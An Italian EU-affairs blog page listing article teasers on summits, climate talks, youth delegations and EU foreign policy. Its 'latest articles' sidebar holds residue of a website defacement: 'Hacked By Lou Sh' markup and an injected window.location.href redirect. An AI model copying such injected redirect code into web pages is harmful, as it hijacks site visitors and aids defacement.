EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Relazioni Internazionali

Relazioni Internazionali


Relazioni Internazionali

it

Al termine del summit UE – USA i leader dell’Unione europea e degli Stati Uniti hanno presentato una dichiarazione congiunta articolata intorno alle questioni di vitale importanza per i cittadini del mondo. Sono state stabilite con forza le priorità ed è stato tracciato un percorso comune per costruire un mondo più sicuro, ricco e sano da lasciare in eredità alle generazioni future.

Innanzitutto l’impegno a creare nuovi posti di lavoro, soprattutto per i giovani, e una crescita sostenibile attraverso politiche economiche sane, realizzando concretamente gli impegni del G 20.

I leader hanno ribadito il loro impegno a concludere rapidamente il Transatlantic Trade and (...)

it

Sembra che le decisioni diplomatiche internazionali siano più lente dei cambiamenti climatici. Sedici COP dopo la terza, la storica Conferenza di Kyoto, esperti, tecnici, diplomatici e politici da tutto il mondo si sono riuniti a Varsavia per discutere di riscaldamento globale. Nessun accordo rilevante è stato raggiunto. Tutti sanno però quando e dove rivedersi per la ventesima Conferenza sul clima.

Nella storia della diplomazia internazionale, piena di summit e incontri nati con i migliori auspici, spesso accade che le buone intenzioni si trasformino, di fatto, in grandi delusioni. La storia del Protocollo di Kyoto, i cui esiti sono inferiori alle aspettative, non è un’eccezione.

Kyoto, (...)

it

La metà di loro ha deciso di emigrare: forse per libera scelta. O forse perché in Italia la fuga dei cervelli non è soltanto una chiacchiera da bar. Una cosa però è certa: questi ragazzi sono pronti a rientrare per rappresentare il proprio Stato! È pronta infatti la delegazione giovanile italiana che volerà al Y8, il side-event del G8, in programma a Londra dal 24 al 28 giugno.

Le otto figure richieste al Summit hanno ora un volto e un nome. E forse a Londra non si farà la storia, ma finalmente si farà buona politica, partendo dal basso con impegno, dedizione e passione.

La delegazione

Il gruppo sarà guidato da Marco Garlatti, in veste di capo dello Stato: “Penso che da (...)

it

Per far fronte alle difficoltà vissute dal popolo iracheno, l’UE propone una coalizione a livello economico, solidale e commerciale. Questo per sanare i perenni contrasti che continuamente ascoltiamo attraverso i media e che coinvolgono l’Iraq, soprattutto a livello di diritti umani. Un grande obiettivo che si propongono i parlamentari europei è stabilire la pace ed introdurre norme democratiche fondamentali che ancora mancano.

Avanzamento economico in cambio di un avanzamento in materia di diritti umani per far sì che si arrivi ad una democrazia che possa riequilibrare il Paese: questo il sunto dell’accordo tra UE e Iraq.

La proposta di un bilanciamento tra Europa ed Iraq a livello democratico è partita dal relatore (...)

it

Se sei appassionato di diplomazia e vuoi rappresentare il tuo Paese nei più importanti Summits internazionali non prendere impegni dal 17 al 24 giugno 2013! YAS, Young Ambassadors Society, ti dà l’opportunità di diventare Delegato e rappresentare l’Italia ai Forum dei governi più industrializzati al mondo.

Y20 Russia

Dal 17 al 22 giungo 2013 in Russia, nell’affascinante cornice offerta dalla città di San Pietroburgo si svolgerà il Youth20 (Y20), il side event giovanile ufficiale del G20. Il Summit Y20 verterà su temi prettamente economici e finanziari. Le due grandi aree tematiche di riflessione (...)

it

Grande soddifazione tra i vertici dell'Ue per il raggiungimento di questo importante traguardo. L'apparato delle indicazioni geografiche (IG, così sono definiti tali tipi di operazioni) oltre a rappresentare un importante mezzo di salvaguardia dei prodotti tipici, sempre più a rischio imitazione, costituisce un valido mezzo di marketing. Ovviamente sono stati dieci anche i prodotti cinesi inclusi nel progetto "10+10", i quali si aggiungono alle oltre mille denominazioni già presenti sul territorio Ue. Osservando nel dettaglio, i prodotti italiani ad aver ottenuto questa sorta di certificazione sono stati il Grana Padano ed il Prosciutto di Parma.

Il progetto ha visto la luce del sole nel lontano 2007, quando sia la Cina che l’Unione europea richiesero ufficialmente la tutela di dieci indicazioni geografiche nei territori interessati. Il tutto riguardava inizialmente prodotti agricoli. Ora ogni qualvolta una parte chiede all’altra (...)

it

Catherine Ashton, Alto rappresentante UE per la Politica estera comune, arriva a Beirut e rassicura il Paese dopo la nuova ondata di morti che lo sta investendo. A seguito dell’attentato e dell’uccisione del generale Wissan Al Hassan si sono susseguiti molti disordini, per questo la Ashton ha voluto sottolineare l’apprezzamento dei tentativi che le massime cariche dello stato libanese stanno facendo per mantenere l’ordine.

Mentre il Libano soffre perdite innocenti e disordini per tutto il paese, l’Unione europea cerca di dare tranquillità e lo fa inviando Catherine Ashton, Alto rappresentante per la Politica estera dell’Unione europea, a Beirut per dei brevi ma decisivi incontri con le massime cariche del paese, (...)

it

Nota congiunta sottoscritta per assicurare il rispetto della libertà di espressione e di tutti i Profeti e condannare l'incitamento all'odio religioso, che nelle ultime settimane ha favorito atti di violenza e vittime nelle sedi diplomatiche.

Le violenze seguite alla diffusione del film anti-islamico ‘L’innocenza dei musulmani’ e le vignette satiriche di Charlie Hebdo su Maometto hanno imposto la formazione di un fronte comune internazionale per combattere l’odio religioso.

Nota congiunta Per contrastare l’escalation di manifestazioni (...)

it

Washington DC ha ospitato, dal tre al nove giugno, la settima edizione del G8&G20 Youth Summits. Si tratta di eventi giovanili che si svolgono, ogni anno, parallelamente ai celebri incontri internazionali dei Leaders mondiali, riunendo centinaia di giovani e brillanti studenti provenienti da tutti i paesi del G20.

Dopo i primi incontri virtuali per la stesura dell’Agenda dei temi di discussione, i giovani Ministri si trovano a dibatterne in prima persona attorno al tavolo di negoziazione. Tutto questo porta, infine, alla stesura di un comunicato Finale, conosciuto col nome di Final Communiqué, di cui vi (...)

it

Con l'espansione dei BRICS, l'ascesa di nuove potenze, la crisi di vecchi protagonisti: quale corso prenderanno gli eventi dei vertici internazionali G8 & G20? La soluzione nel dibattito tra già noti attori e nuove giovani realtà.

Anche il G20 di Los Cabos è giunto alla sua conclusione. Dopo due giorni di negoziazioni, il 19 giugno i Leaders sono giunti alla firma della Declaration. Quattordici pagine, contenenti ottantacinque punti nei quali vengono discussi i più importanti temi di attualità internazionale e che (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France